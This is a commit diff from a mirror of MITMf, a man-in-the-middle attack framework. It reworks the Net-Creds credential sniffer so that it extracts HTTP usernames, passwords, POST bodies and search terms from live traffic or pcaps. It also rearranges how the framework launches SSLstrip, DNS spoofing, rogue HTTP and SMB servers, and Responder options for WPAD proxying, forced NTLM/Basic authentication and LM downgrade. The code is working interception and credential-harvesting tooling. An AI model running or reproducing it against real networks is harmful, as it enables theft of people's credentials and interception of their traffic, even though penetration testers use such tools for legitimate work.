Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-07 13:32:18 -07:00)
Fixed bug where Net-Creds wouldn't parse URLs and HTTP data when reading from a pcap
Active packet filtering engine and proxy + servers are now mutually exclusive; you can only start one of them (iptables conflicts)
This commit is contained in:
  parent 28fc081068
  commit 986b2b851f

9 changed files with 179 additions and 160 deletions
core/configwatcher.py

@@ -21,7 +21,7 @@ import pyinotify
 import threading
 from configobj import ConfigObj

-class ConfigWatcher(pyinotify.ProcessEvent):
+class ConfigWatcher(pyinotify.ProcessEvent, object):

     @property
     def config(self):
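Why mix in `object`: ConfigWatcher exposes `config` through `@property`, and in Python 2 the descriptor protocol is only fully honored on new-style classes (pyinotify's ProcessEvent appears to be a classic class here, so the mixin is what upgrades ConfigWatcher). A minimal Python 2 sketch of the difference; the class and attribute names are illustrative, not from the commit:

# Python 2 sketch: reads hit the getter either way, but only the new-style
# class stops an assignment from silently shadowing the property.
class OldStyle:                        # classic class, like pyinotify.ProcessEvent
    @property
    def config(self):
        return {'setting': 'value'}

class NewStyle(object):                # what ConfigWatcher becomes after this commit
    @property
    def config(self):
        return {'setting': 'value'}

old = OldStyle()
old.config = 'clobbered'               # instance dict wins on classic classes
print old.config                       # 'clobbered'

new = NewStyle()
try:
    new.config = 'clobbered'           # read-only property: raises AttributeError
except AttributeError:
    print new.config                   # {'setting': 'value'}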
core/netcreds.py
@@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
 # Prone to false+ but prefer that to false-
 http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'

+parsing_pcap = False
+
 class NetCreds:

     version = "1.0"
@@ -51,15 +53,64 @@ class NetCreds:
         except Exception as e:
             if "Interrupted system call" in e: pass

-    def start(self, interface, ip, pcap):
-        if pcap:
-            for pkt in PcapReader(pcap):
-                pkt_parser(pkt)
-            sys.exit()
-        else:
-            t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
-            t.setDaemon(True)
-            t.start()
+    def start(self, interface, ip):
+        t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
+        t.setDaemon(True)
+        t.start()
+
+    def parse_pcap(self, pcap):
+        parsing_pcap=True
+
+        for pkt in PcapReader(pcap):
+            pkt_parser(pkt)
+
+        sys.exit()
+
+def frag_remover(ack, load):
+    '''
+    Keep the FILO OrderedDict of frag loads from getting too large
+    3 points of limit:
+        Number of ip_ports < 50
+        Number of acks per ip:port < 25
+        Number of chars in load < 5000
+    '''
+    global pkt_frag_loads
+
+    # Keep the number of IP:port mappings below 50
+    # last=False pops the oldest item rather than the latest
+    while len(pkt_frag_loads) > 50:
+        pkt_frag_loads.popitem(last=False)
+
+    # Loop through a deep copy dict but modify the original dict
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        if len(copy_pkt_frag_loads[ip_port]) > 0:
+            # Keep 25 ack:load's per ip:port
+            while len(copy_pkt_frag_loads[ip_port]) > 25:
+                pkt_frag_loads[ip_port].popitem(last=False)
+
+    # Recopy the new dict to prevent KeyErrors for modifying dict in loop
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        # Keep the load less than 75,000 chars
+        for ack in copy_pkt_frag_loads[ip_port]:
+            # If load > 5000 chars, just keep the last 200 chars
+            if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
+                pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
+
+def frag_joiner(ack, src_ip_port, load):
+    '''
+    Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
+    '''
+    for ip_port in pkt_frag_loads:
+        if src_ip_port == ip_port:
+            if ack in pkt_frag_loads[src_ip_port]:
+                # Make pkt_frag_loads[src_ip_port][ack] = full load
+                old_load = pkt_frag_loads[src_ip_port][ack]
+                concat_load = old_load + load
+                return OrderedDict([(ack, concat_load)])
+
+    return OrderedDict([(ack, load)])

 def pkt_parser(pkt):
     '''
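The practical effect of the split, as a usage sketch (it assumes the MITMf tree on sys.path; `opts` stands in for the parsed argparse namespace): live capture stays on a daemon thread, while pcap parsing is a blocking run-to-completion path that ends in sys.exit(). One caveat worth noting: as written, `parsing_pcap=True` binds a local name inside parse_pcap, so making the module-level flag visible to other_parser would need a `global parsing_pcap` declaration.

from core.netcreds import NetCreds

def start_netcreds(opts):
    creds = NetCreds()
    if opts.read_pcap:
        # offline: feeds every packet through pkt_parser(), then exits
        creds.parse_pcap(opts.read_pcap)
    else:
        # live: the sniffer thread is daemonized so MITMf keeps control
        creds.start(opts.interface, opts.ip)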
@@ -127,53 +178,7 @@ def pkt_parser(pkt):
             telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)

         # HTTP and other protocols that run on TCP + a raw load
-        other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
+        other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)

-def frag_remover(ack, load):
-    '''
-    Keep the FILO OrderedDict of frag loads from getting too large
-    3 points of limit:
-        Number of ip_ports < 50
-        Number of acks per ip:port < 25
-        Number of chars in load < 5000
-    '''
-    global pkt_frag_loads
-
-    # Keep the number of IP:port mappings below 50
-    # last=False pops the oldest item rather than the latest
-    while len(pkt_frag_loads) > 50:
-        pkt_frag_loads.popitem(last=False)
-
-    # Loop through a deep copy dict but modify the original dict
-    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
-    for ip_port in copy_pkt_frag_loads:
-        if len(copy_pkt_frag_loads[ip_port]) > 0:
-            # Keep 25 ack:load's per ip:port
-            while len(copy_pkt_frag_loads[ip_port]) > 25:
-                pkt_frag_loads[ip_port].popitem(last=False)
-
-    # Recopy the new dict to prevent KeyErrors for modifying dict in loop
-    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
-    for ip_port in copy_pkt_frag_loads:
-        # Keep the load less than 75,000 chars
-        for ack in copy_pkt_frag_loads[ip_port]:
-            # If load > 5000 chars, just keep the last 200 chars
-            if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
-                pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
-
-def frag_joiner(ack, src_ip_port, load):
-    '''
-    Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
-    '''
-    for ip_port in pkt_frag_loads:
-        if src_ip_port == ip_port:
-            if ack in pkt_frag_loads[src_ip_port]:
-                # Make pkt_frag_loads[src_ip_port][ack] = full load
-                old_load = pkt_frag_loads[src_ip_port][ack]
-                concat_load = old_load + load
-                return OrderedDict([(ack, concat_load)])
-
-    return OrderedDict([(ack, load)])

 def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
     '''
@@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
         msg = 'IRC pass: %s' % pass_search2.group(1)
         return msg

-def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
+def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
     '''
     Pull out pertinent info from the parsed HTTP packet data
     '''
     user_passwd = None
     http_url_req = None
     method = None
-    http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
+    http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
     http_line, header_lines, body = parse_http_load(full_load, http_methods)
     headers = headers_to_dict(header_lines)
     if 'host' in headers:
@@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
     else:
         host = ''

-    #if http_line != None:
-    #    method, path = parse_http_line(http_line, http_methods)
-    #    http_url_req = get_http_url(method, host, path, headers)
-    #    if http_url_req != None:
-    #        printer(src_ip_port, None, http_url_req)
-
-    # Print search terms
-    searched = get_http_searches(http_url_req, body, host)
-    if searched:
-        printer(src_ip_port, dst_ip_port, searched)
-
-    #We dont need this cause its being taking care of by the proxy
-    #Print user/pwds
-    #if body != '':
-    #    user_passwd = get_login_pass(body)
-    #    if user_passwd != None:
-    #        try:
-    #            http_user = user_passwd[0].decode('utf8')
-    #            http_pass = user_passwd[1].decode('utf8')
-    #            # Set a limit on how long they can be prevent false+
-    #            if len(http_user) > 75 or len(http_pass) > 75:
-    #                return
-    #            user_msg = 'HTTP username: %s' % http_user
-    #            printer(src_ip_port, dst_ip_port, user_msg)
-    #            pass_msg = 'HTTP password: %s' % http_pass
-    #            printer(src_ip_port, dst_ip_port, pass_msg)
-    #        except UnicodeDecodeError:
-    #            pass
-
-    # Print POST loads
-    # ocsp is a common SSL post load that's never interesting
-    #if method == 'POST' and 'ocsp.' not in host:
-    #    try:
-    #        msg = 'POST load: %s' % body.encode('utf8')
-    #        printer(src_ip_port, None, msg)
-    #    except UnicodeDecodeError:
-    #        pass
+    if parsing_pcap is True:
+
+        if http_line != None:
+            method, path = parse_http_line(http_line, http_methods)
+            http_url_req = get_http_url(method, host, path, headers)
+            if http_url_req != None:
+                if verbose == False:
+                    if len(http_url_req) > 98:
+                        http_url_req = http_url_req[:99] + '...'
+                printer(src_ip_port, None, http_url_req)
+
+        # Print search terms
+        searched = get_http_searches(http_url_req, body, host)
+        if searched:
+            printer(src_ip_port, dst_ip_port, searched)
+
+        # Print user/pwds
+        if body != '':
+            user_passwd = get_login_pass(body)
+            if user_passwd != None:
+                try:
+                    http_user = user_passwd[0].decode('utf8')
+                    http_pass = user_passwd[1].decode('utf8')
+                    # Set a limit on how long they can be prevent false+
+                    if len(http_user) > 75 or len(http_pass) > 75:
+                        return
+                    user_msg = 'HTTP username: %s' % http_user
+                    printer(src_ip_port, dst_ip_port, user_msg)
+                    pass_msg = 'HTTP password: %s' % http_pass
+                    printer(src_ip_port, dst_ip_port, pass_msg)
+                except UnicodeDecodeError:
+                    pass
+
+        # Print POST loads
+        # ocsp is a common SSL post load that's never interesting
+        if method == 'POST' and 'ocsp.' not in host:
+            try:
+                if verbose == False and len(body) > 99:
+                    # If it can't decode to utf8 we're probably not interested in it
+                    msg = 'POST load: %s...' % body[:99].encode('utf8')
+                else:
+                    msg = 'POST load: %s' % body.encode('utf8')
+                printer(src_ip_port, None, msg)
+            except UnicodeDecodeError:
+                pass

     # Kerberos over TCP
     decoded = Decode_Ip_Packet(str(pkt)[14:])
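The new `verbose` flag only affects output length: non-verbose runs clip URLs past 98 characters and POST bodies past 99 characters to a short preview. A standalone Python 2 sketch of the URL branch above:

def clip_url(url):
    # mirrors the diff's rule: anything past 98 chars becomes a
    # 99-char preview plus an ellipsis
    if len(url) > 98:
        return url[:99] + '...'
    return url

print clip_url('http://example.com/?q=' + 'A' * 200)   # clipped
print clip_url('http://example.com/?q=short')          # unchanged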
@@ -904,7 +916,7 @@ def get_login_pass(body):

 def printer(src_ip_port, dst_ip_port, msg):
     if dst_ip_port != None:
-        print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
+        print_str = '[{} > {}] {}'.format((src_ip_port, dst_ip_port, msg))
         # All credentials will have dst_ip_port, URLs will not

         log.info("{}".format(print_str))
core/packetfilter.py

@@ -1,5 +1,3 @@
-import threading
-
 from core.utils import set_ip_forwarding, iptables
 from core.logger import logger
 from scapy.all import *
@@ -21,9 +19,7 @@ class PacketFilter:
         self.nfqueue = NetfilterQueue()
         self.nfqueue.bind(1, self.modify)

-        t = threading.Thread(name='packetparser', target=self.nfqueue.run)
-        t.setDaemon(True)
-        t.start()
+        self.nfqueue.run()

     def modify(self, pkt):
         #log.debug("Got packet")
core/proxyplugins.py

@@ -108,9 +108,10 @@ class ProxyPlugins:
         log.debug("hooking {}()".format(fname))
         #calls any plugin that has this hook
         try:
-            for f in self.plugin_mthds[fname]:
-                a = f(**args)
-                if a != None: args = a
+            if self.plugin_mthds:
+                for f in self.plugin_mthds[fname]:
+                    a = f(**args)
+                    if a != None: args = a
         except Exception as e:
             #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
             log.error("Exception occurred in hooked function")
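For context, the hook loop threads an `args` dict through every registered plugin method, and each method may return a replacement dict for the next one; the new `if self.plugin_mthds:` guard simply turns the whole hook into a no-op when nothing has registered yet. A self-contained Python 2 sketch of that chaining contract (the hook name and function are made up):

def add_header(**args):
    args['headers']['X-Injected'] = '1'
    return args

plugin_mthds = {'handleResponse': [add_header]}

args = {'headers': {}}
if plugin_mthds:                 # the new guard
    for f in plugin_mthds['handleResponse']:
        a = f(**args)
        if a != None: args = a
print args                       # {'headers': {'X-Injected': '1'}}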
mitmf.py
@@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
 #add MITMf options
 sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
 sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
-sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
+sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
 sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
 sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
 sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
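With required=True, argparse rejects a missing -i up front instead of letting the failure surface later (presumably in get_ip(options.interface) with a None interface). A quick demonstration:

import argparse

p = argparse.ArgumentParser()
p.add_argument("-i", dest='interface', required=True, type=str)

print p.parse_args(['-i', 'eth0'])   # Namespace(interface='eth0')
p.parse_args([])                     # exits: "error: argument -i is required"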
@@ -73,6 +73,15 @@ options = parser.parse_args()
 #Set the log level
 logger().log_level = logging.__dict__[options.log_level.upper()]

+from core.logger import logger
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("MITMf", formatter)
+
+from core.netcreds import NetCreds
+
+if options.read_pcap:
+    NetCreds().parse_pcap(options.read_pcap)
+
 #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
 from core.utils import get_ip, get_mac, shutdown
 options.ip = get_ip(options.interface)
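Since parse_pcap() ends in sys.exit(), the --read-pcap path now prints whatever credentials the capture holds and terminates before the interface checks below ever run, which is why the option no longer has to be threaded through NetCreds().start().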
@@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)

 settings.Config.populate(options)

-from core.logger import logger
-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-log = logger().setup_logger("MITMf", formatter)
-
 log.debug("MITMf started: {}".format(sys.argv))

 #Start Net-Creds
-from core.netcreds import NetCreds
-NetCreds().start(options.interface, options.ip, options.read_pcap)
+print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
+
+NetCreds().start(options.interface, options.ip)
+print "|"
+print "|_ Net-Creds v{} online".format(NetCreds.version)

-from core.sslstrip.CookieCleaner import CookieCleaner
 from core.proxyplugins import ProxyPlugins
-from core.sslstrip.StrippingProxy import StrippingProxy
-from core.sslstrip.URLMonitor import URLMonitor
-
-URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
-URLMonitor.getInstance().setCaching(options.preserve_cache)
-CookieCleaner.getInstance().setEnabled(options.killsessions)
-
-strippingFactory = http.HTTPFactory(timeout=10)
-strippingFactory.protocol = StrippingProxy
-
-reactor.listenTCP(options.listen_port, strippingFactory)

 ProxyPlugins().all_plugins = plugins

-print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
 for plugin in plugins:

     #load only the plugins that have been called at the command line
@@ -126,48 +120,63 @@ for plugin in plugins:
         for line in xrange(0, len(plugin.tree_info)):
             print "| |_ {}".format(plugin.tree_info.pop())

-        plugin.reactor(strippingFactory)
         plugin.start_config_watch()

-print "|"
-print "|_ Sergio-Proxy v0.2.1 online"
-print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-print "|"
-
 if options.filter:
     from core.packetfilter import PacketFilter
     pfilter = PacketFilter(options.filter)
-    pfilter.start()
     print "|_ PacketFilter online"
-    print "| |_ Applying filter {} to incoming packets".format(options.filter)
+    print " |_ Applying filter {} to incoming packets".format(options.filter)
+    try:
+        pfilter.start()
+    except KeyboardInterrupt:
+        pfilter.stop()
+        shutdown()

-print "|_ Net-Creds v{} online".format(NetCreds.version)
+else:
+    from core.sslstrip.CookieCleaner import CookieCleaner
+    from core.sslstrip.StrippingProxy import StrippingProxy
+    from core.sslstrip.URLMonitor import URLMonitor

-#Start mitmf-api
-from core.mitmfapi import mitmfapi
-print "|_ MITMf-API online"
-mitmfapi().start()
+    URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+    URLMonitor.getInstance().setCaching(options.preserve_cache)
+    CookieCleaner.getInstance().setEnabled(options.killsessions)

-#Start the HTTP Server
-from core.servers.HTTP import HTTP
-HTTP().start()
-print "|_ HTTP server online"
+    strippingFactory = http.HTTPFactory(timeout=10)
+    strippingFactory.protocol = StrippingProxy

-#Start DNSChef
-from core.servers.DNS import DNSChef
-DNSChef().start()
-print "|_ DNSChef v{} online".format(DNSChef.version)
+    reactor.listenTCP(options.listen_port, strippingFactory)

-#Start the SMB server
-from core.servers.SMB import SMB
-SMB().start()
-print "|_ SMB server online\n"
+    for plugin in plugins:
+        if vars(options)[plugin.optname] is True:
+            plugin.reactor(strippingFactory)

-#start the reactor
-reactor.run()
-print "\n"
+    print "|_ Sergio-Proxy v0.2.1 online"
+    print "|_ SSLstrip v0.9 by Moxie Marlinspike online"

-if options.filter:
-    pfilter.stop()
+    #Start mitmf-api
+    from core.mitmfapi import mitmfapi
+    print "|"
+    print "|_ MITMf-API online"
+    mitmfapi().start()

-shutdown()
+    #Start the HTTP Server
+    from core.servers.HTTP import HTTP
+    HTTP().start()
+    print "|_ HTTP server online"
+
+    #Start DNSChef
+    from core.servers.DNS import DNSChef
+    DNSChef().start()
+    print "|_ DNSChef v{} online".format(DNSChef.version)
+
+    #Start the SMB server
+    from core.servers.SMB import SMB
+    SMB().start()
+    print "|_ SMB server online\n"
+
+    #start the reactor
+    reactor.run()
+    print "\n"
+
+    shutdown()
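Condensed, this new top level is what enforces the mutual exclusion from the commit message: the NFQUEUE filter and the proxy/server stack never run in the same process, so their iptables rules cannot collide. An illustrative Python 2 outline with hypothetical helper names, not the verbatim script:

def run_packet_filter(expression):
    print "|_ PacketFilter online"
    # pfilter.start() blocks inside nfqueue.run() until Ctrl-C

def start_proxy_and_servers():
    print "|_ HTTP server online"
    # sslstrip factory, mitmfapi, HTTP/DNS/SMB servers, reactor.run()

class Opts(object):
    filter = None            # stand-in for the parsed argparse namespace

opts = Opts()
if opts.filter:
    run_packet_filter(opts.filter)   # filter engine owns iptables
else:
    start_proxy_and_servers()        # proxy + servers own the redirects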
plugins/plugin.py

@@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):

     def __init__(self, parser):
         '''Passed the options namespace'''

         if self.desc:
             sgroup = parser.add_argument_group(self.name, self.desc)
         else:
plugins/responder.py

@@ -91,5 +91,5 @@ class Responder(Plugin):
         options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
         options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
         options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
-        options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
-        options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
+        options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
+        options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
plugins/spoof.py

@@ -70,7 +70,7 @@ class Spoof(Plugin):

         if options.dns:
             self.tree_info.append('DNS spoofing enabled')
-            if iptables().dns is False:
+            if iptables().dns is False and options.filter is False:
                 iptables().DNS(self.config['MITMf']['DNS']['port'])

         if not options.arp and not options.icmp and not options.dhcp and not options.dns:
@@ -78,7 +78,7 @@ class Spoof(Plugin):

         set_ip_forwarding(1)

-        if iptables().http is False:
+        if iptables().http is False and options.filter is False:
             iptables().HTTP(options.listen_port)

         for protocol in self.protocol_instances:
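The added `options.filter is False` checks keep Spoof from installing its DNS and HTTP redirect rules while the packet filtering engine owns the NFQUEUE chain; that overlap is the iptables conflict the commit message refers to.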
plugins/sslstripplus.py

@@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
         from core.servers.DNS import DNSChef
         from core.utils import iptables

-        if iptables().dns is False:
+        if iptables().dns is False and options.filter is False:
             iptables().DNS(self.config['MITMf']['DNS']['port'])

         URLMonitor.getInstance().setHstsBypass()